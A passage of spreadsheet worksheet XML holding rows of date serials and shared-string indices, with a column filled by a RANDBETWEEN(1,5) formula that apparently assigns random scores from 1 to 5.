      <c r="C1836" t="s">
        <v>10</v>
      </c>
      <c r="D1836" t="s">
        <v>36</v>
      </c>
      <c r="E1836" t="s">
        <v>1898</v>
      </c>
      <c r="F1836">
        <f t="shared" ca="1" si="28"/>
        <v>5</v>
      </c>
    </row>
    <row r="1837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1837" s="1">
        <v>43523.616655092592</v>
      </c>
      <c r="B1837" t="s">
        <v>13</v>
      </c>
      <c r="C1837" t="s">
        <v>10</v>
      </c>
      <c r="D1837" t="s">
        <v>17</v>
      </c>
      <c r="E1837" t="s">
        <v>1899</v>
      </c>
      <c r="F1837">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1838" s="1">
        <v>43523.616284722222</v>
      </c>
      <c r="B1838" t="s">
        <v>13</v>
      </c>
      <c r="C1838" t="s">
        <v>10</v>
      </c>
      <c r="D1838" t="s">
        <v>6</v>
      </c>
      <c r="E1838" t="s">
        <v>1900</v>
      </c>
      <c r="F1838">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1839" s="1">
        <v>43523.614884259259</v>
      </c>
      <c r="B1839" t="s">
        <v>9</v>
      </c>
      <c r="C1839" t="s">
        <v>6</v>
      </c>
      <c r="D1839" t="s">
        <v>25</v>
      </c>
      <c r="E1839" t="s">
        <v>828</v>
      </c>
      <c r="F1839">
        <f t="shared" ca="1" si="28"/>
        <v>3</v>
      </c>
    </row>
    <row r="1840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1840" s="1">
        <v>43523.614652777775</v>
      </c>
      <c r="B1840" t="s">
        <v>9</v>
      </c>
      <c r="C1840" t="s">
        <v>6</v>
      </c>
      <c r="D1840" t="s">
        <v>25</v>
      </c>
      <c r="E1840" t="s">
        <v>828</v>
      </c>
      <c r="F1840">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1841" s="1">
        <v>43523.614282407405</v>
      </c>
      <c r="B1841" t="s">
        <v>9</v>
      </c>
      <c r="C1841" t="s">
        <v>6</v>
      </c>
      <c r="D1841" t="s">
        <v>25</v>
      </c>
      <c r="E1841" t="s">
        <v>828</v>
      </c>
      <c r="F1841">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1842" s="1">
        <v>43523.612534722219</v>
      </c>
      <c r="B1842" t="s">
        <v>9</v>
      </c>
      <c r="C1842" t="s">
        <v>6</v>
      </c>
      <c r="D1842" t="s">
        <v>25</v>
      </c>
      <c r="E1842" t="s">
        <v>828</v>
      </c>
      <c r="F1842">
        <f t="shared" ca="1" si="28"/>
        <v>3</v>
      </c>
    </row>
    <row r="1843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1843" s="1">
        <v>43523.611932870372</v>
      </c>
      <c r="B1843" t="s">
        <v>9</v>
      </c>
      <c r="C1843" t="s">
        <v>6</v>
      </c>
      <c r="D1843" t="s">
        <v>25</v>
      </c>
      <c r="E1843" t="s">
        <v>828</v>
      </c>
      <c r="F1843">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1844" s="1">
        <v>43523.611192129632</v>
      </c>
      <c r="B1844" t="s">
        <v>9</v>
      </c>
      <c r="C1844" t="s">
        <v>6</v>
      </c>
      <c r="D1844" t="s">
        <v>25</v>
      </c>
      <c r="E1844" t="s">
        <v>828</v>
      </c>
      <c r="F1844">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1845" s="1">
        <v>43523.610613425924</v>
      </c>
      <c r="B1845" t="s">
        <v>9</v>
      </c>
      <c r="C1845" t="s">
        <v>6</v>
      </c>
      <c r="D1845" t="s">
        <v>25</v>
      </c>
      <c r="E1845" t="s">
        <v>828</v>
      </c>
      <c r="F1845">
        <f t="shared" ca="1" si="28"/>
        <v>3</v>
      </c>
    </row>
    <row r="1846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1846" s="1">
        <v>43523.608842592592</v>
      </c>
      <c r="B1846" t="s">
        <v>9</v>
      </c>
      <c r="C1846" t="s">
        <v>6</v>
      </c>
      <c r="D1846" t="s">
        <v>25</v>
      </c>
      <c r="E1846" t="s">
        <v>828</v>
      </c>
      <c r="F1846">
        <f t="shared" ca="1" si="28"/>
        <v>5</v>
      </c>
    </row>
    <row r="1847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1847" s="1">
        <v>43523.608391203707</v>
      </c>
      <c r="B1847" t="s">
        <v>9</v>
      </c>
      <c r="C1847" t="s">
        <v>6</v>
      </c>
      <c r="D1847" t="s">
        <v>25</v>
      </c>
      <c r="E1847" t="s">
        <v>828</v>
      </c>
      <c r="F1847">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1848" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1848" s="1">
        <v>43523.596261574072</v>
      </c>
      <c r="B1848" t="s">
        <v>9</v>
      </c>
      <c r="C1848" t="s">
        <v>10</v>
      </c>
      <c r="D1848" t="s">
        <v>6</v>
      </c>
      <c r="E1848" s="2" t="s">
        <v>1901</v>
      </c>
      <c r="F1848">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1849" s="1">
        <v>43523.594560185185</v>
      </c>
      <c r="B1849" t="s">
        <v>19</v>
      </c>
      <c r="C1849" t="s">
        <v>10</v>
      </c>
      <c r="D1849" t="s">
        <v>6</v>
      </c>
      <c r="E1849" t="s">
        <v>1902</v>
      </c>
      <c r="F1849">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1850" s="1">
        <v>43523.59306712963</v>
      </c>
      <c r="B1850" t="s">
        <v>19</v>
      </c>
      <c r="C1850" t="s">
        <v>6</v>
      </c>
      <c r="D1850" t="s">
        <v>821</v>
      </c>
      <c r="E1850" t="s">
        <v>1903</v>
      </c>
      <c r="F1850">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1851" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1851" s="1">
        <v>43523.590648148151</v>
      </c>
      <c r="B1851" t="s">
        <v>5</v>
      </c>
      <c r="C1851" t="s">
        <v>10</v>
      </c>
      <c r="D1851" t="s">
        <v>80</v>
      </c>
      <c r="E1851" s="2" t="s">
        <v>1904</v>
      </c>
      <c r="F1851">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1852" s="1">
        <v>43523.577534722222</v>
      </c>
      <c r="B1852" t="s">
        <v>5</v>
      </c>
      <c r="C1852" t="s">
        <v>6</v>
      </c>
      <c r="D1852" t="s">
        <v>25</v>
      </c>
      <c r="E1852" t="s">
        <v>1905</v>
      </c>
      <c r="F1852">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1853" s="1">
        <v>43523.573784722219</v>
      </c>
      <c r="B1853" t="s">
        <v>5</v>
      </c>
      <c r="C1853" t="s">
        <v>6</v>
      </c>
      <c r="D1853" t="s">
        <v>25</v>
      </c>
      <c r="E1853" t="s">
        <v>1906</v>
      </c>
      <c r="F1853">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1854" s="1">
        <v>43523.573240740741</v>
      </c>
      <c r="B1854" t="s">
        <v>19</v>
      </c>
      <c r="C1854" t="s">
        <v>10</v>
      </c>
      <c r="D1854" t="s">
        <v>41</v>
      </c>
      <c r="E1854" t="s">
        <v>1907</v>
      </c>
      <c r="F1854">
        <f t="shared" ca="1" si="28"/>
        <v>5</v>
      </c>
    </row>
    <row r="1855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1855" s="1">
        <v>43523.566168981481</v>
      </c>
      <c r="B1855" t="s">
        <v>5</v>
      </c>
      <c r="C1855" t="s">
        <v>6</v>
      </c>
      <c r="D1855" t="s">
        <v>25</v>
      </c>
      <c r="E1855" t="s">
        <v>1908</v>
      </c>
      <c r="F1855">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1856" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A1856" s="1">
        <v>43523.55641203704</v>
      </c>
      <c r="B1856" t="s">
        <v>19</v>
      </c>
      <c r="C1856" t="s">
        <v>10</v>
      </c>
      <c r="D1856" t="s">
        <v>6</v>
      </c>
      <c r="E1856" s="2" t="s">
        <v>1909</v>
      </c>
      <c r="F1856">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1857" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1857" s="1">
        <v>43523.553599537037</v>
      </c>
      <c r="B1857" t="s">
        <v>19</v>
      </c>
      <c r="C1857" t="s">
        <v>461</v>
      </c>
      <c r="E1857" s="2" t="s">
        <v>1910</v>
      </c>
      <c r="F1857">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1858" s="1">
        <v>43523.542731481481</v>
      </c>
      <c r="B1858" t="s">
        <v>5</v>
      </c>
      <c r="C1858" t="s">
        <v>41</v>
      </c>
      <c r="E1858" t="s">
        <v>1911</v>
      </c>
      <c r="F1858">
        <f t="shared" ref="F1858:F1921" ca="1" si="29">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="1859" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1859" s="1">
        <v>43523.535810185182</v>
      </c>
      <c r="B1859" t="s">
        <v>19</v>
      </c>
      <c r="C1859" t="s">
        <v>10</v>
      </c>
      <c r="D1859" t="s">
        <v>52</v>
      </c>
      <c r="E1859" t="s">
        <v>1912</v>
      </c>
      <c r="F1859">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1860" s="1">
        <v>43523.531608796293</v>
      </c>
      <c r="B1860" t="s">
        <v>19</v>
      </c>
      <c r="C1860" t="s">
        <v>10</v>
      </c>
      <c r="D1860" t="s">
        <v>52</v>
      </c>
      <c r="E1860" t="s">
        <v>1912</v>
      </c>
      <c r="F1860">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1861" s="1">
        <v>43523.526331018518</v>
      </c>
      <c r="B1861" t="s">
        <v>19</v>
      </c>
      <c r="C1861" t="s">
        <v>10</v>
      </c>
      <c r="D1861" t="s">
        <v>290</v>
      </c>
      <c r="E1861" t="s">
        <v>1913</v>
      </c>
      <c r="F1861">
        <f t="shared" ca="1" si="29"/>
        <v>1</v>
      </c>
    </row>
    <row r="1862" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1862" s="1">
        <v>43523.518587962964</v>
      </c>
      <c r="B1862" t="s">
        <v>13</v>
      </c>
      <c r="C1862" t="s">
        <v>10</v>
      </c>
      <c r="D1862" t="s">
        <v>89</v>
      </c>
      <c r="E1862" s="2" t="s">
        <v>1914</v>
      </c>
      <c r="F1862">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1863" s="1">
        <v>43523.51090277778</v>
      </c>
      <c r="B1863" t="s">
        <v>19</v>
      </c>
      <c r="C1863" t="s">
        <v>10</v>
      </c>
      <c r="E1863" t="s">
        <v>1915</v>
      </c>
      <c r="F1863">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1864" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1864" s="1">
        <v>43523.494803240741</v>
      </c>
      <c r="B1864" t="s">
        <v>1305</v>
      </c>
      <c r="C1864" t="s">
        <v>48</v>
      </c>
      <c r="E1864" s="2" t="s">
        <v>1916</v>
      </c>
      <c r="F1864">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1865" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A1865" s="1">
        <v>43523.493923611109</v>
      </c>
      <c r="B1865" t="s">
        <v>13</v>
      </c>
      <c r="C1865" t="s">
        <v>10</v>
      </c>
      <c r="D1865" t="s">
        <v>80</v>
      </c>
      <c r="E1865" s="2" t="s">
        <v>1917</v>
      </c>
      <c r="F1865">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1866" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1866" s="1">
        <v>43523.476585648146</v>
      </c>
      <c r="B1866" t="s">
        <v>13</v>
      </c>
      <c r="C1866" t="s">
        <v>10</v>
      </c>
      <c r="D1866" t="s">
        <v>494</v>
      </c>
      <c r="E1866" s="2" t="s">
        <v>1918</v>
      </c>
      <c r="F1866">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1867" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1867" s="1">
        <v>43523.472627314812</v>
      </c>
      <c r="B1867" t="s">
        <v>13</v>
      </c>
      <c r="C1867" t="s">
        <v>10</v>
      </c>
      <c r="D1867" t="s">
        <v>52</v>
      </c>
      <c r="E1867" t="s">
        <v>1919</v>
      </c>
      <c r="F1867">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1868" s="1">
        <v>43523.467974537038</v>
      </c>
      <c r="B1868" t="s">
        <v>9</v>
      </c>
      <c r="C1868" t="s">
        <v>6</v>
      </c>
      <c r="D1868" t="s">
        <v>25</v>
      </c>
      <c r="E1868" t="s">
        <v>1920</v>
      </c>
      <c r="F1868">
        <f t="shared" ca="1" si="29"/>
        <v>1</v>
      </c>
    </row>
    <row r="1869" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1869" s="1">
        <v>43523.467094907406</v>
      </c>
      <c r="B1869" t="s">
        <v>19</v>
      </c>
      <c r="C1869" t="s">
        <v>10</v>
      </c>
      <c r="D1869" t="s">
        <v>6</v>
      </c>
      <c r="E1869" s="2" t="s">
        <v>1921</v>
      </c>
      <c r="F1869">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1870" s="1">
        <v>43523.459953703707</v>
      </c>
      <c r="B1870" t="s">
        <v>9</v>
      </c>
      <c r="C1870" t="s">
        <v>6</v>
      </c>
      <c r="D1870" t="s">
        <v>25</v>
      </c>
      <c r="E1870" t="s">
        <v>1846</v>
      </c>
      <c r="F1870">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1871" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1871" s="1">
        <v>43523.451180555552</v>
      </c>
      <c r="B1871" t="s">
        <v>13</v>
      </c>
      <c r="C1871" t="s">
        <v>333</v>
      </c>
      <c r="E1871" s="2" t="s">
        <v>1922</v>
      </c>
      <c r="F1871">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1872" s="1">
        <v>43523.446574074071</v>
      </c>
      <c r="B1872" t="s">
        <v>9</v>
      </c>
      <c r="C1872" t="s">
        <v>6</v>
      </c>
      <c r="D1872" t="s">
        <v>25</v>
      </c>
      <c r="E1872" t="s">
        <v>1920</v>
      </c>
      <c r="F1872">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1873" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1873" s="1">
        <v>43523.442245370374</v>
      </c>
      <c r="B1873" t="s">
        <v>13</v>
      </c>
      <c r="C1873" t="s">
        <v>10</v>
      </c>
      <c r="D1873" t="s">
        <v>36</v>
      </c>
      <c r="E1873" s="2" t="s">
        <v>1923</v>
      </c>
      <c r="F1873">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1874" s="1">
        <v>43523.408553240741</v>
      </c>
      <c r="B1874" t="s">
        <v>13</v>
      </c>
      <c r="C1874" t="s">
        <v>10</v>
      </c>
      <c r="D1874" t="s">
        <v>192</v>
      </c>
      <c r="E1874" t="s">
        <v>1924</v>
      </c>
      <c r="F1874">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1875" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1875" s="1">
        <v>43523.407268518517</v>
      </c>
      <c r="B1875" t="s">
        <v>13</v>
      </c>
      <c r="C1875" t="s">
        <v>103</v>
      </c>
      <c r="E1875" s="2" t="s">
        <v>1925</v>
      </c>
      <c r="F1875">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1876" s="1">
        <v>43523.401273148149</v>
      </c>
      <c r="B1876" t="s">
        <v>19</v>
      </c>
      <c r="C1876" t="s">
        <v>41</v>
      </c>
      <c r="E1876" t="s">
        <v>1926</v>
      </c>
      <c r="F1876">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1877" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1877" s="1">
        <v>43523.395439814813</v>
      </c>
      <c r="B1877" t="s">
        <v>13</v>
      </c>
      <c r="C1877" t="s">
        <v>10</v>
      </c>
      <c r="D1877" t="s">
        <v>494</v>
      </c>
      <c r="E1877" s="2" t="s">
        <v>1927</v>
      </c>
      <c r="F1877">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1878" s="1">
        <v>43523.383368055554</v>
      </c>
      <c r="B1878" t="s">
        <v>19</v>
      </c>
      <c r="C1878" t="s">
        <v>10</v>
      </c>
      <c r="D1878" t="s">
        <v>158</v>
      </c>
      <c r="E1878" t="s">
        <v>1928</v>
      </c>
      <c r="F1878">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1879" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1879" s="1">
        <v>43523.379641203705</v>
      </c>
      <c r="B1879" t="s">
        <v>5</v>
      </c>
      <c r="C1879" t="s">
        <v>10</v>
      </c>
      <c r="D1879" t="s">
        <v>163</v>
      </c>
      <c r="E1879" s="2" t="s">
        <v>1929</v>
      </c>
      <c r="F1879">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1880" s="1">
        <v>43523.359027777777</v>
      </c>
      <c r="B1880" t="s">
        <v>19</v>
      </c>
      <c r="C1880" t="s">
        <v>16</v>
      </c>
      <c r="E1880" t="s">
        <v>1930</v>
      </c>
      <c r="F1880">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1881" s="1">
        <v>43523.333680555559</v>
      </c>
      <c r="B1881" t="s">
        <v>13</v>
      </c>
      <c r="C1881" t="s">
        <v>1931</v>
      </c>
      <c r="E1881" t="s">
        <v>1932</v>
      </c>
      <c r="F1881">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1882" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1882" s="1">
        <v>43523.325775462959</v>
      </c>
      <c r="B1882" t="s">
        <v>5</v>
      </c>
      <c r="C1882" t="s">
        <v>41</v>
      </c>
      <c r="E1882" s="2" t="s">
        <v>1933</v>
      </c>
      <c r="F1882">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1883" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A1883" s="1">
        <v>43523.323495370372</v>
      </c>
      <c r="B1883" t="s">
        <v>13</v>
      </c>
      <c r="C1883" t="s">
        <v>41</v>
      </c>
      <c r="E1883" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="F1883">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1884" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1884" s="1">
        <v>43523.295752314814</v>
      </c>
      <c r="B1884" t="s">
        <v>19</v>
      </c>
      <c r="C1884" t="s">
        <v>71</v>
      </c>
      <c r="E1884" s="2" t="s">
        <v>1935</v>
      </c>
      <c r="F1884">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1885" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1885" s="1">
        <v>43523.291712962964</v>
      </c>
      <c r="B1885" t="s">
        <v>1305</v>
      </c>
      <c r="C1885" t="s">
        <v>430</v>
      </c>
      <c r="E1885" s="2" t="s">
        <v>1936</v>
      </c>
      <c r="F1885">
        <f t="shared" ca="1" si="29"/>
        <v>1</v>
      </c>
    </row>
    <row r="1886" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1886" s="1">
        <v>43523.258368055554</v>
      </c>
      <c r="B1886" t="s">
        <v>13</v>
      </c>
      <c r="C1886" t="s">
        <v>41</v>
      </c>
      <c r="E1886" s="2" t="s">
        <v>1937</v>
      </c>
      <c r="F1886">
        <f t="shared" ca="1" si="29"/>
        <v>1</v>
      </c>
    </row>
    <row r="1887" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1887" s="1">
        <v>43523.249722222223</v>
      </c>
      <c r="B1887" t="s">
        <v>5</v>
      </c>
      <c r="C1887" t="s">
        <v>71</v>
      </c>
      <c r="E1887" s="2" t="s">
        <v>1938</v>
      </c>
      <c r="F1887">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1888" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1888" s="1">
        <v>43523.234918981485</v>
      </c>
      <c r="B1888" t="s">
        <v>13</v>
      </c>
      <c r="C1888" t="s">
        <v>41</v>
      </c>
      <c r="E1888" t="s">
        <v>1939</v>
      </c>
      <c r="F1888">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1889" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1889" s="1">
        <v>43523.179803240739</v>
      </c>
      <c r="B1889" t="s">
        <v>13</v>
      </c>
      <c r="C1889" t="s">
        <v>461</v>
      </c>
      <c r="E1889" s="2" t="s">
        <v>1940</v>
      </c>
      <c r="F1889">
        <f t="shared" ca="1" si="29"/>
        <v>1</v>
      </c>
    </row>
    <row r="1890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1890" s="1">
        <v>43523.155543981484</v>
      </c>
      <c r="B1890" t="s">
        <v>35</v>
      </c>
      <c r="C1890" t="s">
        <v>410</v>
      </c>
      <c r="E1890" t="s">
        <v>1941</v>
      </c>
      <c r="F1890">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1891" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1891" s="1">
        <v>43523.152615740742</v>
      </c>
      <c r="B1891" t="s">
        <v>5</v>
      </c>
      <c r="C1891" t="s">
        <v>48</v>
      </c>
      <c r="E1891" s="2" t="s">
        <v>1942</v>
      </c>
      <c r="F1891">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1892" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1892" s="1">
        <v>43523.149988425925</v>
      </c>
      <c r="B1892" t="s">
        <v>5</v>
      </c>
      <c r="C1892" t="s">
        <v>10</v>
      </c>
      <c r="D1892" t="s">
        <v>6</v>
      </c>
      <c r="E1892" s="2" t="s">
        <v>1943</v>
      </c>
      <c r="F1892">
        <f t="shared" ca="1" si="29"/>
        <v>1</v>
      </c>
    </row>
    <row r="1893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1893" s="1">
        <v>43523.147905092592</v>
      </c>
      <c r="B1893" t="s">
        <v>1305</v>
      </c>
      <c r="C1893" t="s">
        <v>60</v>
      </c>
      <c r="E1893" t="s">
        <v>1944</v>
      </c>
      <c r="F1893">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1894" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1894" s="1">
        <v>43523.143171296295</v>
      </c>
      <c r="B1894" t="s">
        <v>5</v>
      </c>
      <c r="C1894" t="s">
        <v>197</v>
      </c>
      <c r="E1894" t="s">
        <v>1945</v>
      </c>
      <c r="F1894">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1895" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1895" s="1">
        <v>43523.068148148152</v>
      </c>
      <c r="B1895" t="s">
        <v>5</v>
      </c>
      <c r="C1895" t="s">
        <v>140</v>
      </c>
      <c r="D1895" t="s">
        <v>750</v>
      </c>
      <c r="E1895" s="2" t="s">
        <v>1946</v>
      </c>
      <c r="F1895">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1896" s="1">
        <v>43523.06050925926</v>
      </c>
      <c r="B1896" t="s">
        <v>5</v>
      </c>
      <c r="C1896" t="s">
        <v>471</v>
      </c>
      <c r="E1896" t="s">
        <v>1947</v>
      </c>
      <c r="F1896">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1897" s="1">
        <v>43523.036620370367</v>
      </c>
      <c r="B1897" t="s">
        <v>13</v>
      </c>
      <c r="C1897" t="s">
        <v>686</v>
      </c>
      <c r="E1897" t="s">
        <v>1948</v>
      </c>
      <c r="F1897">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1898" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1898" s="1">
        <v>43523.005127314813</v>
      </c>
      <c r="B1898" t="s">
        <v>13</v>
      </c>
      <c r="C1898" t="s">
        <v>10</v>
      </c>
      <c r="D1898" t="s">
        <v>6</v>
      </c>
      <c r="E1898" t="s">
        <v>1949</v>
      </c>
      <c r="F1898">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1899" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1899" s="1">
        <v>43522.991469907407</v>
      </c>
      <c r="B1899" t="s">
        <v>13</v>
      </c>
      <c r="C1899" t="s">
        <v>71</v>
      </c>
      <c r="E1899" s="2" t="s">
        <v>1950</v>
      </c>
      <c r="F1899">
        <f t="shared" ca="1" si="29"/>
        <v>1</v>
      </c>
    </row>
    <row r="1900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1900" s="1">
        <v>43522.858946759261</v>
      </c>
      <c r="B1900" t="s">
        <v>13</v>
      </c>
      <c r="C1900" t="s">
        <v>10</v>
      </c>
      <c r="D1900" t="s">
        <v>6</v>
      </c>
      <c r="E1900" t="s">
        <v>1951</v>
      </c>
      <c r="F1900">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1901" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1901" s="1">
        <v>43522.819004629629</v>
      </c>
      <c r="B1901" t="s">
        <v>5</v>
      </c>
      <c r="C1901" t="s">
        <v>124</v>
      </c>
      <c r="E1901" s="2" t="s">
        <v>1952</v>
      </c>
      <c r="F1901">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1902" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1902" s="1">
        <v>43522.794074074074</v>
      </c>
      <c r="B1902" t="s">
        <v>5</v>
      </c>
      <c r="C1902" t="s">
        <v>10</v>
      </c>
      <c r="D1902" t="s">
        <v>6</v>
      </c>
      <c r="E1902" s="2" t="s">
        <v>1953</v>
      </c>
      <c r="F1902">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1903" s="1">
        <v>43522.760127314818</v>
      </c>
      <c r="B1903" t="s">
        <v>13</v>
      </c>
      <c r="C1903" t="s">
        <v>10</v>
      </c>
      <c r="D1903" t="s">
        <v>112</v>
      </c>
      <c r="E1903" t="s">
        <v>1954</v>
      </c>
      <c r="F1903">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1904" s="1">
        <v>43522.753946759258</v>
      </c>
      <c r="B1904" t="s">
        <v>5</v>
